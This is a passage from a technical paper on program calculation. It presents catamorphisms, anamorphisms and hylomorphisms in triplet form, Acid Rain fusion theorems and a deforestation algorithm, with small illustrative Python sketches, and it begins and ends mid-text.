the concise notation \( h : \varphi \rightarrow \psi \) to represent this property. The category \( \mathcal{ALG}(F) \) is the category whose objects are \( F \)-algebras and whose morphisms are \( F \)-homomorphisms. Dually, \( \mathcal{COALG}(F) \) is the category of \( F \)-co-algebras with \( F \)-co-homomorphisms. The nice thing about working in CPO is that \( \mathcal{ALG}(F) \) has an initial object and \( \mathcal{COALG}(F) \) has a final object, and their carriers coincide.
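As a concrete illustration (our own sketch, not part of the paper), the product and separated-sum combinators can be transcribed into Python: pairs model products, and tagged pairs model the sum, ignoring the \( \perp \) elements.

```python
# Product/sum combinators of Definitions 2.1 and 2.2, sketched in Python.
# Pairs (a, b) model products; tagged pairs ('L', x) / ('R', x) model the
# separated sum (the bottom element of the CPO is ignored here).

def exl(p): return p[0]          # left projection
def exr(p): return p[1]          # right projection

def split(f, g):                 # f (triangle) g : a -> (f a, g a)
    return lambda a: (f(a), g(a))

def prod(f, g):                  # f x g, defined as (f . exl) split (g . exr)
    return split(lambda p: f(exl(p)), lambda p: g(exr(p)))

def inl(a): return ('L', a)      # left injection
def inr(b): return ('R', b)      # right injection

def junc(f, g):                  # f (junc) g : case analysis on the sum
    return lambda v: f(v[1]) if v[0] == 'L' else g(v[1])
```

For instance, `prod(f, g)` applies `f` to the first component and `g` to the second, exactly as the characterizing equation \( f \times g = (f \circ \text{exl}) \vartriangle (g \circ \text{exr}) \) prescribes.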
By Scott's inverse limit construction for fixed points of functors, we get an \( F \)-algebra \( \text{in}_F : F \mu F \rightarrow \mu F \) which is initial in \( \mathcal{ALG}(F) \), and an \( F \)-co-algebra \( \text{out}_F : \mu F \rightarrow F \mu F \) which is final in \( \mathcal{COALG}(F) \). They are each other's inverses, and establish an isomorphism \( \mu F \cong F \mu F \) in \( C \). They also satisfy the equation \( \mu(\lambda f. \text{in}_F \circ F f \circ \text{out}_F) = \text{id}_{\mu F} \). Here \( \mu \) is the fixed point operator, which satisfies \( \mu h = h(\mu h) \). We say the type \( \mu F \) is the (algebraic) data type defined by the functor \( F \). Type declarations define data types and initial algebras. For example, \[ \text{nat} ::= \text{Zero} \mid \text{Succ}\ \text{nat} \] declares that \( \text{in}_N = \text{Zero} \triangledown \text{Succ} : N\,\text{nat} \rightarrow \text{nat} \) is the initial \( N \)-algebra, where \( N \) is the functor \( N = \perp + \text{id} \) (i.e. \( N A = \perp + A \) and \( N h = \text{id}_\perp + h \)) and \( \text{nat} = \mu N \). Here, \( \perp \) is the terminal object in \( C \) and \( \text{Zero} : \perp \rightarrow \text{nat} \) is a constant. Data types can be parametrized. For example, the type declaration of lists with elements of type \( A \): \[ \text{list}\ A ::= \text{Nil} \mid \text{Cons} (A, \text{list}\ A) \] declares that \( \text{in}_{L_A} = \text{Nil} \triangledown \text{Cons} : L_A(\text{list}\ A) \rightarrow \text{list}\ A \) is the initial \( L_A \)-algebra, with the functor \( L_A = \perp + A \times \text{id} \) (i.e. \( L_A B = \perp + (A \times B) \) and \( L_A h = \text{id}_\perp + (\text{id}_A \times h) \)). As the final \( L_A \)-co-algebra, we can take: \[ \text{out}_{L_A} = (\text{id}_\perp + (\text{hd} \vartriangle \text{tl})) \circ \text{isnil?} : \text{list}\ A \rightarrow L_A(\text{list}\ A) \] Here \( \text{p} \)?
injects a value \( x \) of type \( A \) into the sum type \( A + A \) according to the result of \( \text{p}\ x \). The definition of \( \text{out}_{L_A} \) above corresponds to \[ \lambda x.\ \text{if isnil}\ x\ \text{then}\ \perp\ \text{else}\ (\text{hd}\ x, \text{tl}\ x) \] We sometimes write \( L(A, B) \) instead of \( L_A(B) \), where we think of \( L \) as a bifunctor (i.e. \( L(A, B) = \perp + (A \times B) \) and \( L(f, h) = \text{id}_\perp + (f \times h) \)). Every parametrized type constructor is associated with a certain functor, called a \emph{type functor} (a map functor). For example, the type functor list coincides with the familiar \text{map} function. Type functors can be defined in general using the notion of catamorphism; we give the definition in the next section. ### 2.3 Catamorphisms and Anamorphisms Initiality of \( \text{in}_F \) in \( \mathcal{ALG}(F) \) implies: for any \( F \)-algebra \( \varphi : FA \rightarrow A \), there exists a unique \( F \)-homomorphism \( h : \text{in}_F \rightarrow \varphi \). This homomorphism is called a \emph{catamorphism} and denoted by \( (\!|\varphi|\!) \). Dually, the finality of \( \text{out}_F \) in \( \mathcal{COALG}(F) \) implies: for any \( F \)-co-algebra \( \psi : A \to FA \), there exists a unique \( F \)-co-homomorphism \( h : \psi \to \text{out}_F \), called an anamorphism and denoted by \( [\!(\psi)\!] \). These two morphisms can equivalently be defined as least fixed points: \[ \begin{align*} (\!|\cdot|\!)_F & : (FA \to A) \to \mu F \to A \\ (\!|\varphi|\!)_F & = \mu(\lambda f. \varphi \circ F f \circ \text{out}_F) \\ [\!(\cdot)\!]_F & : (A \to FA) \to A \to \mu F \\ [\!(\psi)\!]_F & = \mu(\lambda f. \text{in}_F \circ F f \circ \psi) \end{align*} \] We sometimes omit the suffix \( F \) when it is clear from the context.
From these fixed point definitions and the properties of \( \mu \), \( \text{in}_F \) and \( \text{out}_F \), it is easy to see that the following equalities hold: \[ \begin{align*} (\!|\varphi|\!) & = \varphi \circ F (\!|\varphi|\!) \circ \text{out}_F \\ (\!|\varphi|\!) \circ \text{in}_F & = \varphi \circ F (\!|\varphi|\!) \\ [\!(\psi)\!] & = \text{in}_F \circ F [\!(\psi)\!] \circ \psi \\ \text{out}_F \circ [\!(\psi)\!] & = F [\!(\psi)\!] \circ \psi \end{align*} \] Catamorphisms are generalized fold operations that substitute the constructors of a data type with other operations of the same signature. Catamorphisms provide a standard way to consume a data structure; dually, anamorphisms, which are generalized unfold operations, offer a standard way to construct data structures. It has been argued in [GLPJ93, SF93] that many standard functions over data structures can be represented using catamorphisms. We are now ready to give the general definition of type functors. Given an initial algebra \( \text{in} : F(A, TA) \to TA \), the type functor \( T \) is defined by \[ Tf = (\!|\text{in} \circ F(f, \text{id})|\!). \] For example, for lists, \[ \begin{align*} \text{in}_{L_A} & : L(A, \text{list}\ A) \to \text{list}\ A \\ \text{list}\ f & = (\!|(\text{Nil} \triangledown \text{Cons}) \circ L(f, \text{id})|\!)_{L_A} \\ & = (\!|(\text{Nil} \triangledown \text{Cons}) \circ (\text{id}_\perp + (f \times \text{id}))|\!)_{L_A} \\ & = (\!|\text{Nil} \triangledown (\text{Cons} \circ (f \times \text{id}))|\!)_{L_A}. \end{align*} \] By expanding the definition of the catamorphism, we get the usual definition of the map function on lists. ### 2.4 Hylomorphisms A hylomorphism \( \llbracket \varphi, \psi \rrbracket \) is the composition of a catamorphism with an anamorphism: \( (\!|\varphi|\!) \circ [\!(\psi)\!] \).
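The fixed-point equations above can be transcribed directly into executable form. Below is our own Python sketch (not from the paper) for the list functor \( L_A B = \perp + (A \times B) \), with `None` playing the role of the Nil summand and a pair `(head, rest)` the Cons summand:

```python
# Catamorphisms and anamorphisms over the list functor, following the
# fixed-point equations  (|phi|) = phi . L (|phi|) . out   and
#                        [(psi)] = in . L [(psi)] . psi.

def out_list(xs):                 # final co-algebra: list A -> L_A (list A)
    return None if not xs else (xs[0], xs[1:])

def in_list(v):                   # initial algebra: L_A (list A) -> list A
    return [] if v is None else [v[0]] + v[1]

def fmap_L(h, v):                 # functor action L_A h on the recursive slot
    return None if v is None else (v[0], h(v[1]))

def cata(phi):                    # generalized fold
    def go(xs): return phi(fmap_L(go, out_list(xs)))
    return go

def ana(psi):                     # generalized unfold
    def go(seed): return in_list(fmap_L(go, psi(seed)))
    return go

# The type functor (map) as a catamorphism: replace Cons(a, r) by (f a, r).
def list_map(f):
    return cata(lambda v: in_list(None if v is None else (f(v[0]), v[1])))
```

For example, `cata(lambda v: 0 if v is None else 1 + v[1])` is the length function, and `ana(lambda n: None if n == 0 else (n, n - 1))` unfolds a countdown list.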
Equivalently [MFP91], a hylomorphism can be defined directly as a least fixed point: \[ \begin{align*} \llbracket \cdot, \cdot \rrbracket_F & : (FA \to A) \times (B \to FB) \to B \to A \\ \llbracket \varphi, \psi \rrbracket_F & = \mu(\lambda f. \varphi \circ F f \circ \psi) \end{align*} \] It is obvious from the definitions that catamorphisms and anamorphisms are special cases of hylomorphisms: \[ (\!|\varphi|\!) = \llbracket \varphi, \text{out}_F \rrbracket, \quad [\!(\psi)\!] = \llbracket \text{in}_F, \psi \rrbracket \] The hylomorphism \( \llbracket \varphi, \psi \rrbracket \) is a recursive function whose call graph is isomorphic to the data type \( \mu F \). It is known that most practical functions can be represented as hylomorphisms ([BM94]). Meertens proved in [Mee92] that every primitive recursive function on an algebraic type can be represented as a hylomorphism on some algebraic type. Hylomorphisms enjoy many useful laws for program calculation. The law called HyloShift, \[ \eta : F \to G \Rightarrow \llbracket \varphi \circ \eta, \psi \rrbracket_F = \llbracket \varphi, \eta \circ \psi \rrbracket_G, \] shows that natural transformations can be shifted between the two parameters of a hylomorphism. Based on this property we will introduce a new notation for hylomorphisms in section 3.3. 3 Rules for Deforestation 3.1 Shortcut Deforestation The core of the shortcut deforestation algorithm proposed in [GLPJ93] is the single cancellation rule for a pair of foldr and build: \[ g : \forall \beta . (A \to \beta \to \beta) \to \beta \to \beta \Rightarrow \text{foldr} \ k \ z \ (\text{build} \ g) = g \ k \ z \] where the function build is defined as \[ \text{build} \ g = g \ \text{Cons} \ \text{Nil}. \] Using foldr and build to standardize the structure of list-consuming/producing functions, their transformation consists of repeated applications of this rule. By expanding the definition of build, we get \[ g : \forall \beta .
(A \to \beta \to \beta) \to \beta \to \beta \Rightarrow \text{foldr} \ k \ z \ (g \ \text{Cons} \ \text{Nil}) = g \ k \ z \] This rule can be restated in terms of catamorphisms: \[ g : \forall B . (L_A B \to B) \to B \Rightarrow (\!|\varphi|\!)_{L_A} (g \ \text{in}_{L_A}) = g \ \varphi \] This law nicely captures the intuition behind a catamorphism, namely to replace the constructors \( \text{in}_{L_A} \), the initial \( L_A \)-algebra, by the function \( \varphi \), an arbitrary \( L_A \)-algebra. Now we have enough clues to generalize this rule to other algebraic types. 3.2 Acid Rain Theorem The analysis in the previous section suggests that the following theorem holds in general ([Mei94]). Theorem 3.1 (Acid Rain) \[ g : \forall A . (FA \to A) \to A \Rightarrow (\!|\varphi|\!)_{F} (g \ \text{in}_{F}) = g \ \varphi \] Proof The free theorem ([Wad89]) associated with the type of \( g \) is \[ f \circ \psi = \varphi \circ F f \Rightarrow f (g \ \psi) = g \ \varphi \] In case \( g \) is defined using recursion, \( f \) needs to be strict as well. By taking \( f := (\!|\varphi|\!)_{F} \) and \( \psi := \text{in}_{F} \), this rule is instantiated to \[ (\!|\varphi|\!)_{F} \circ \text{in}_{F} = \varphi \circ F (\!|\varphi|\!)_{F} \Rightarrow (\!|\varphi|\!)_{F} (g \ \text{in}_{F}) = g \ \varphi \] The premise trivially holds because \( (\!|\varphi|\!)_{F} \) satisfies its defining fixed point equation (and is strict as well). \( \square \) For the applications we have in mind it is more convenient to rephrase the Acid Rain theorem at the function level: Theorem 3.2 (Acid Rain : Catamorphism) \[ g : \forall A. (F A \rightarrow A) \rightarrow B \rightarrow A \Rightarrow (\!|\varphi|\!)_F \circ (g \ \text{in}_F) = g \ \varphi \] Here \( B \) is some fixed type that does not depend on \( A \). One of the benefits of working at the function level is that we can take the dual of this rule. Theorem 3.3 (Acid Rain : Anamorphism) \[ h : \forall A.
(A \rightarrow F A) \rightarrow A \rightarrow B \Rightarrow (h \ \text{out}_F) \circ [\!(\psi)\!]_F = h \ \psi \] It is not difficult to prove these theorems as free theorems in the same way as the first one; we omit the proofs here. The two acid rain theorems show how we can generalize shortcut deforestation to arbitrary algebraic data types, and moreover provide yet another deforesting transformation, for values produced by unfolding. Although these two rules are general enough to capture every case where we can deforest intermediate data structures of arbitrary type, it is not easy to design an automatic deforestation algorithm based on them. It is not obvious how to find the places (redexes) in the program where these rules are applicable, nor in which order we should apply the rules when the redexes overlap. As the rules are stated at the function level and cover the dual cases (anamorphisms), there are more chances for overlapping redexes. To tackle this problem we need some syntactic clue in the program for finding the candidates for \( g \) or \( h \) of these rules. The ideal representation of programs must make it easy to find these candidate polymorphic functions together with catamorphisms and anamorphisms. The natural choice is hylomorphisms, which include catamorphisms and anamorphisms as special cases; moreover, most practical functions can be represented as hylomorphisms ([BM94]). ### 3.3 Hylomorphisms as Triplets We adopt hylomorphisms as the basic components to represent the structure of programs. In preparation for designing our deforestation algorithm, we restate the above two Acid Rain rules as a single theorem about hylomorphisms. Many functions are catamorphic on their input type and anamorphic on their output type at the same time.
For example, the function \( \text{length} \), which returns the length of a given list, is a catamorphism on \( \text{list}\ A \) and an anamorphism on \( \text{nat} \): \[ \text{length} = (\!|\text{Zero} \triangledown (\text{Succ} \circ \text{exr})|\!)_{L_A} = [\!((\text{id}_\perp + \text{tl}) \circ \text{isnil?})\!]_N \] For any natural transformation \( \eta : F \rightarrow G \), HyloShift implies \[ (\!|\text{in}_G \circ \eta|\!)_F = \llbracket \text{in}_G \circ \eta, \text{out}_F \rrbracket_F = \llbracket \text{in}_G, \eta \circ \text{out}_F \rrbracket_G = [\!(\eta \circ \text{out}_F)\!]_G \] If we do not want to miss the chance that this kind of hylomorphism forms a redex for the Acid Rain rules, possible applications of the HyloShift rule always have to be considered. To avoid this cumbersomeness, we prepare a neutral representation for them: we introduce a new notation for hylomorphisms in which the natural transformation is explicitly factored out as an extra second parameter. Definition 3.1 (Hylomorphism in triplet form) The hylomorphism \( \llbracket \varphi, \eta, \psi \rrbracket_{G,F} \) is defined as follows: \[ \llbracket \varphi, \eta, \psi \rrbracket_{G,F} = \mu(\lambda f. \varphi \circ \eta \circ F f \circ \psi) \] \[ \llbracket \cdot, \cdot, \cdot \rrbracket_{G,F} : (G A \rightarrow A) \times (F \rightarrow G) \times (B \rightarrow FB) \rightarrow (B \rightarrow A) \] We sometimes omit the suffix \( G,F \) when it is clear from the context. With this notation, hylomorphisms which are essentially built up from some natural transformation can be represented as such.
Now the example explained above has a proper neutral representation as a hylomorphism: \[ (\!|\text{in}_G \circ \eta|\!)_F = \llbracket \text{in}_G, \eta, \text{out}_F \rrbracket_{G,F} = [\!(\eta \circ \text{out}_F)\!]_G \] The function \( \text{length} \) is represented as follows: \[ \text{length} = \llbracket \text{in}_N, \text{id} + \text{exr}, \text{out}_{L_A} \rrbracket_{N,L_A} \] The type functor \( T \) defined in section 2.3 can always be represented as a hylomorphism of this kind: \[ Tf = \llbracket \text{in}, F(f, \text{id}), \text{out} \rrbracket \] With this notation, it becomes much easier to judge whether a hylomorphism is a catamorphism or an anamorphism. If the third parameter of the hylomorphism is \( \text{out}_F \), it is an \( F \)-catamorphism, and if its first parameter is \( \text{in}_G \), it is a \( G \)-anamorphism. The HyloShift rule becomes \[ \llbracket \varphi, \eta, \psi \rrbracket_{G,F} = \llbracket \varphi \circ \eta, \text{id}, \psi \rrbracket_{F,F} = \llbracket \varphi, \text{id}, \eta \circ \psi \rrbracket_{G,G} \] 3.4 Rules for Hylomorphism Fusion The Acid Rain theorems for catamorphisms and anamorphisms can be restated in terms of the new notation for hylomorphisms. Theorem 3.4 (Cata-HyloFusion) \[ \tau : \forall A.(F A \rightarrow A) \rightarrow F' A \rightarrow A \Rightarrow \llbracket \varphi, \eta_1, \text{out}_F \rrbracket_{G,F} \circ \llbracket \tau\,\text{in}_F, \eta_2, \psi \rrbracket_{F',F''} = \llbracket \tau (\varphi \circ \eta_1), \eta_2, \psi \rrbracket_{F',F''} \] Proof The first component of the left-hand side is just a catamorphism \( ((\!|\varphi \circ \eta_1|\!)_F) \). The second component hylomorphism has a type \( B \rightarrow A \) where \( A \) and \( B \) are the carriers of \( \tau\,\text{in}_F \) and \( \psi \), respectively. Consider the following lambda term: \[ g = \lambda f. \llbracket \tau f, \eta_2, \psi \rrbracket_{F',F''} \] As \( \tau \) is polymorphic, \( g \) is also polymorphic and has the type \[ g : \forall A.(F A \rightarrow A) \rightarrow B \rightarrow A \] This type exactly matches the type requirement for \( g \) in Theorem 3.2, and simple instantiation proves the theorem.
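The triplet form can be made concrete with a small executable sketch (ours, not the paper's): the third component unfolds a seed one step, the second applies the natural transformation, and the first folds one layer of the result, so no intermediate structure is ever built. We represent both functor layers as `None` or a pair whose second component is the recursive position.

```python
# Triplet hylomorphism [[phi, eta, psi]] = mu(\f. phi . eta . F f . psi),
# sketched for functors whose values are None or (payload, recursive_slot).

def hylo(phi, eta, psi):
    def go(seed):
        v = psi(seed)                                  # B -> F B  (one unfold step)
        v = eta(v)                                     # F -> G    (natural transformation)
        v = None if v is None else (v[0], go(v[1]))    # G go      (recurse)
        return phi(v)                                  # G A -> A  (one fold step)
    return go

# length = [[in_N, id + exr, out_L]]: eta drops the list element (exr),
# phi interprets Zero as 0 and Succ as (1 +).
length = hylo(
    phi=lambda v: 0 if v is None else 1 + v[1],            # in_N as an algebra
    eta=lambda v: None if v is None else ((), v[1]),       # id + exr
    psi=lambda xs: None if not xs else (xs[0], xs[1:]),    # out_L
)
```

Note that `length` never allocates a copy of its input: the list is consumed one `psi` step at a time, exactly the behavior the triplet notation is meant to expose.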
□ Taking the dual of this theorem, we get the following theorem. Theorem 3.5 (Hylo-AnaFusion) \[ \sigma : \forall A.(A \rightarrow F A) \rightarrow A \rightarrow F' A \Rightarrow \llbracket \varphi, \eta_1, \sigma\,\text{out}_F \rrbracket_{G,F'} \circ \llbracket \text{in}_F, \eta_2, \psi \rrbracket_{F,F''} = \llbracket \varphi, \eta_1, \sigma (\eta_2 \circ \psi) \rrbracket_{G,F'} \] These two rules provide the theoretical basis of our deforestation algorithm. Note that the HyloSplit\(^{-1}\) rule is just a special case of these rules, obtained by taking \( \tau := \text{id} \) or \( \sigma := \text{id} \): \[ \llbracket \varphi, \eta_1, \text{out}_F \rrbracket_{G,F} \circ \llbracket \text{in}_F, \eta_2, \psi \rrbracket_{F,F''} = \llbracket \varphi, \eta_1 \circ \eta_2, \psi \rrbracket_{G,F''} \] 4 Transformation based on Hylomorphism Fusion Our transformation algorithm is entirely based on the two HyloFusion rules above, and repeatedly applies these rules until no redex is left in the program. Both rules replace the composition of two hylomorphisms with one hylomorphism, so termination is obvious. The application of a rule is always safe in the sense that every application removes some intermediate data structure that was passed through the eliminated composition. The essence of our transformation algorithm is the reduction strategy which controls the order in which redexes are picked up. How to decide the reduction order of overlapping redexes is the main part of the algorithm. 4.1 The Language In principle, our transformation method is applicable to any functional program as long as it includes some compositions of hylomorphisms. But to get the most out of our method, we assume here that programs are entirely written as compositions of hylomorphisms. Programs may of course include lambda expressions inside and outside of hylomorphisms, but explicit recursion is not allowed: every recursion has to be standardized using hylomorphisms. Basic functors and the related combinators can be freely used to combine hylomorphisms or to define the parameters of hylomorphisms.
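Before turning to the examples, the foldr/build cancellation rule of section 3.1, the list-only ancestor of Cata-HyloFusion, can be illustrated in Python (our own sketch; `upto` is a name we invented for a producer written in build form):

```python
# foldr/build cancellation: foldr k z (build g) = g k z.
# The fused right-hand side never materializes the intermediate list.

def foldr(k, z, xs):
    acc = z
    for x in reversed(xs):
        acc = k(x, acc)
    return acc

def build(g):
    # instantiate g's abstract "cons"/"nil" with the real list constructors
    return g(lambda x, r: [x] + r, [])

def upto(n):
    # producer abstracted over the constructors: the list [1..n]
    def g(cons, nil):
        out = nil
        for i in range(n, 0, -1):
            out = cons(i, out)
        return out
    return g

# Unfused: build the list [1,2,3,4], then fold it down to a sum.
unfused = foldr(lambda x, r: x + r, 0, build(upto(4)))
# Fused by cancellation: feed the consumer's operators straight to the producer.
fused = upto(4)(lambda x, r: x + r, 0)
```

Both expressions evaluate to the same sum, but the fused one performs no list allocation at all, which is precisely what the HyloFusion rules achieve for arbitrary algebraic types.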
4.2 Two Examples of Transformation Let us consider the following three standard functions on the list data structure. They are defined as hylomorphisms: \[ \text{length} = \llbracket \text{in}_N, \text{id} + \text{exr}, \text{out}_{L_B} \rrbracket \] \[ \text{map } f = \llbracket \text{in}_{L_B}, L(f, \text{id}), \text{out}_{L_A} \rrbracket \] \[ (\text{++}\ ys) = \llbracket \tau\,\text{in}_{L_A}, \text{id}, \text{out}_{L_A} \rrbracket, \] where \( \tau = \lambda (n \triangledown c). (\llbracket n \triangledown c, \text{id}, \text{out}_{L_A} \rrbracket\ ys) \triangledown c \). Here we assume that \( \lambda (n \triangledown c). \ldots \) is a pattern that matches any \( f \triangledown h \). To define \( (\text{++}\ ys) \) at the proper level of abstraction, the constructors (Nil and Cons) in \( ys \) are replaced by \( n \) and \( c \) systematically, using another hylomorphism in the definition of \( \tau \). This exactly corresponds to the definition of \( \text{++} \) in [GLPJ93]. Then the composition \( \text{length} \circ (\text{map}\ f) \circ (\text{++}\ ys) \) is transformed as follows: \[ \text{length} \circ (\text{map}\ f) \circ (\text{++}\ ys) \\ = \quad \{\text{definitions of length, map and ++}\} \\ \llbracket \text{in}_N, \text{id} + \text{exr}, \text{out}_{L_B} \rrbracket \circ \llbracket \text{in}_{L_B}, L(f, \text{id}), \text{out}_{L_A} \rrbracket \circ \llbracket \tau\,\text{in}_{L_A}, \text{id}, \text{out}_{L_A} \rrbracket \\ = \quad \{\text{HyloSplit}^{-1}\} \\ \llbracket \text{in}_N, (\text{id} + \text{exr}) \circ L(f, \text{id}), \text{out}_{L_A} \rrbracket \circ \llbracket \tau\,\text{in}_{L_A}, \text{id}, \text{out}_{L_A} \rrbracket \\ = \quad \{\text{Cata-HyloFusion}\} \\ \llbracket \tau(\text{in}_N \circ (\text{id} + \text{exr}) \circ L(f, \text{id})), \text{id}, \text{out}_{L_A} \rrbracket \\ = \quad \{\text{definitions of in}_N \text{ and } L\} \\ \llbracket \tau((\text{Zero} \triangledown \text{Succ}) \circ (\text{id} + \text{exr}) \circ (\text{id} + (f \times \text{id}))), \text{id}, \text{out}_{L_A} \rrbracket \\ = \quad \{\text{properties of basic functors}\} \\ \llbracket \tau(\text{Zero} \triangledown (\text{Succ} \circ \text{exr})), \text{id}, \text{out}_{L_A} \rrbracket \\ = \quad \{\text{definition of } \tau\} \\ \llbracket (\llbracket \text{Zero} \triangledown (\text{Succ} \circ \text{exr}), \text{id}, \text{out}_{L_A} \rrbracket\ ys) \triangledown (\text{Succ} \circ \text{exr}), \text{id}, \text{out}_{L_A} \rrbracket \] By inlining the definition
of hylomorphism, we get the familiar recursive definition: \[ \text{length} \circ (\text{map}\ f) \circ (\text{++}\ ys) = h \\ \text{where}\ h\ \text{Nil} = g\ ys \\ \quad\quad h\ (\text{Cons}(x, xs)) = 1 + (h\ xs) \\ \quad\quad g\ \text{Nil} = 0 \\ \quad\quad g\ (\text{Cons}(x, xs)) = 1 + (g\ xs) \] Note that the intermediate lists produced by \( \text{map}\ f \) and \( (\text{++}\ ys) \) are no longer generated. Our second example includes the functions \text{iterate} and \text{takewhile}, which are both anamorphisms on lists. They are usually defined by the following recursive equations: \[ \text{iterate}\ f\ x = \text{Cons}(x, \text{iterate}\ f\ (f\ x)) \\ \text{takewhile}\ p\ \text{Nil} = \text{Nil} \\ \text{takewhile}\ p\ (\text{Cons}(x, xs)) = \text{if}\ p\ x\ \text{then}\ \text{Cons}(x, \text{takewhile}\ p\ xs)\ \text{else}\ \text{Nil} \] They can be defined as hylomorphisms: \[ \text{iterate}\ f = \llbracket \text{in}_{L_A}, \text{id}, \text{inr} \circ (\text{id} \vartriangle f) \rrbracket \\ \text{takewhile}\ p = \llbracket \text{in}_{L_A}, \text{id}, \sigma\,\text{out}_{L_A} \rrbracket \\ \quad \text{where}\ \sigma = \lambda h. (\text{inl} \triangledown g) \circ h \\ \quad\quad \text{where}\ g\ (x, xs) = \text{if}\ p\ x\ \text{then}\ \text{inr}(x, xs)\ \text{else}\ \text{inl}\,() \] Since \text{takewhile} cannot be represented as a catamorphism, the previous methods of [GLPJ93, SF93] cannot remove the intermediate list consumed by \text{takewhile}. Our method naturally covers these dual cases.
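For comparison, the unfused pipeline and the fused h/g recursion above can be transcribed into Python (our own sketch; the function names are invented). Both compute the same number, but the fused version builds no intermediate lists:

```python
# Unfused: materializes the appended list and the mapped list before counting.
def unfused_length_map_append(f, ys, xs):
    return len([f(v) for v in (xs + ys)])

# Fused: the h/g recursion derived in the text. No intermediate lists, and
# the element function f is never even called -- length ignores the mapped
# values, which the fusion makes explicit.
def length_map_append(f, ys, xs):
    def g(zs):                       # counts ys (the part contributed by ++)
        return 0 if not zs else 1 + g(zs[1:])
    def h(zs):                       # counts xs, then falls through to g ys
        return g(ys) if not zs else 1 + h(zs[1:])
    return h(xs)
```

The disappearance of `f` from the fused control path is a small bonus of deforestation: work that only fed the intermediate structure is eliminated along with the structure itself.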
Then the composition \((\text{takewhile } p) \circ (\text{iterate } f)\) is transformed as follows: \[ (\text{takewhile } p) \circ (\text{iterate } f) \\ = \quad \{\text{definitions of takewhile and iterate}\} \\ \llbracket \text{in}_{L_A}, \text{id}, \sigma\,\text{out}_{L_A} \rrbracket \circ \llbracket \text{in}_{L_A}, \text{id}, \text{inr} \circ (\text{id} \vartriangle f) \rrbracket \\ = \quad \{\text{Hylo-AnaFusion}\} \\ \llbracket \text{in}_{L_A}, \text{id}, \sigma(\text{inr} \circ (\text{id} \vartriangle f)) \rrbracket \\ = \quad \{\text{definition of } \sigma\} \\ \llbracket \text{in}_{L_A}, \text{id}, (\text{inl} \triangledown g) \circ \text{inr} \circ (\text{id} \vartriangle f) \rrbracket \\ = \quad \{\text{properties of combinators}\} \\ \llbracket \text{in}_{L_A}, \text{id}, g \circ (\text{id} \vartriangle f) \rrbracket \] By inlining the definition of hylomorphism, we get the following recursive definition: \[ (\text{takewhile } p) \circ (\text{iterate } f) = h \] where \( h\ x = \text{if } p\ x\ \text{then } \text{Cons}(x, h(f\ x))\ \text{else } \text{Nil} \). Note that the intermediate list generated by \(\text{iterate}\) has been eliminated. It is clear from this example that our method is more powerful than the previous methods even when restricted to the list data structure. 4.3 Transformation Algorithm The reduction strategy that controls the order of application of the two rules (Cata-HyloFusion and Hylo-AnaFusion) defines our transformation algorithm. Note that Cata-HyloFusion does not change the compositional interface to the right: the third parameter of the right hylomorphism remains unchanged as the third parameter of the resulting hylomorphism. Dually, Hylo-AnaFusion does not change the compositional interface to the left. We call the redexes of the two rules \textit{Cata-Hylo redexes} and \textit{Hylo-Ana redexes}, respectively. Because there are two kinds of redexes, four different cases of overlapping redexes exist: 1.
Two Cata-Hylo redexes overlap: \[ \llbracket \varphi, \eta_1, \text{out}_F \rrbracket \circ \llbracket \tau_1\,\text{in}_F, \eta_2, \text{out}_G \rrbracket \circ \llbracket \tau_2\,\text{in}_G, \eta_3, \psi \rrbracket \] In this case the reduction of the left redex does not destroy the right one. 2. Two Hylo-Ana redexes overlap: \[ \llbracket \varphi, \eta_1, \sigma_1\,\text{out}_F \rrbracket \circ \llbracket \text{in}_F, \eta_2, \sigma_2\,\text{out}_G \rrbracket \circ \llbracket \text{in}_G, \eta_3, \psi \rrbracket \] In this case the reduction of the right redex does not destroy the left one. 3. A Cata-Hylo redex (on the left) overlaps with a Hylo-Ana redex (on the right): \[ \llbracket \varphi, \eta_1, \text{out}_F \rrbracket \circ \llbracket \tau\,\text{in}_F, \eta_2, \sigma\,\text{out}_G \rrbracket \circ \llbracket \text{in}_G, \eta_3, \psi \rrbracket \] In this case the reduction of either redex does not destroy the other redex. 4. A Hylo-Ana redex (on the left) overlaps with a Cata-Hylo redex (on the right): \[ \llbracket \varphi, \eta_1, \sigma\,\text{out}_F \rrbracket \circ \llbracket \text{in}_F, \eta_2, \text{out}_G \rrbracket \circ \llbracket \tau\,\text{in}_G, \eta_3, \psi \rrbracket \] In this case the reduction of either redex does destroy the other redex. This observation tells us that series of overlapping redexes of the same kind (cases 1 and 2 above) are sensitive to the reduction order. **Definition 4.1 (Redex chain)** A Cata-Hylo (Hylo-Ana) redex chain is a series of Cata-Hylo (Hylo-Ana) redexes with overlaps. The following reduction strategy defines our algorithm: **Definition 4.2 (Reduction order)** 1. Find all maximal Cata-Hylo redex chains, and reduce each chain from left to right. 2. Find all maximal Hylo-Ana redex chains, and reduce each chain from right to left. 3. Simplify the inside of each hylomorphism using the reduction rules for basic functors and related combinators. 4. If there exists any redex for the HyloFusion rules, return to step 1 and continue reduction. The reduction rules used in step 3 are listed in the next section. ### 4.4 Reduction Rules for Basic Functors The following rules are used to reduce the functors during the transformation.
These equations describe some of the properties of the basic functors and related combinators. \[ \begin{align*} \text{exl} \circ (f \times g) &= f \circ \text{exl} \\ \text{exr} \circ (f \times g) &= g \circ \text{exr} \\ \text{exl} \circ (f \vartriangle g) &= f \\ \text{exr} \circ (f \vartriangle g) &= g \\ \text{exl} \vartriangle \text{exr} &= \text{id} \\ (f \times g) \circ (h \vartriangle j) &= (f \circ h) \vartriangle (g \circ j) \\ (f \times g) \circ (h \times j) &= (f \circ h) \times (g \circ j) \\ (f \vartriangle g) \circ h &= (f \circ h) \vartriangle (g \circ h) \\ (f + g) \circ \text{inl} &= \text{inl} \circ f \\ (f + g) \circ \text{inr} &= \text{inr} \circ g \\ (f \triangledown g) \circ \text{inl} &= f \\ (f \triangledown g) \circ \text{inr} &= g \\ \text{inl} \triangledown \text{inr} &= \text{id} \\ (f \triangledown g) \circ (h + j) &= (f \circ h) \triangledown (g \circ j) \\ (f + g) \circ (h + j) &= (f \circ h) + (g \circ j) \\ f \circ (g \triangledown h) &= (f \circ g) \triangledown (f \circ h) \quad (\text{for strict } f) \end{align*} \] 4.5 More Examples of Transformation To demonstrate the power of our transformation, let us consider the following functions: \[ \text{zip} = \llbracket \text{in}_{L_{A \times B}}, (\text{id} + \text{abide}) \circ \text{IsNilOr}, \text{out}_{L_A} \times \text{out}_{L_B} \rrbracket \] where \( \text{abide} = (\text{exl} \times \text{exl}) \vartriangle (\text{exr} \times \text{exr}) \) and (matching the clauses top-down) \[ \text{IsNilOr}\ ((1, x), (1, y)) = (1, (x, 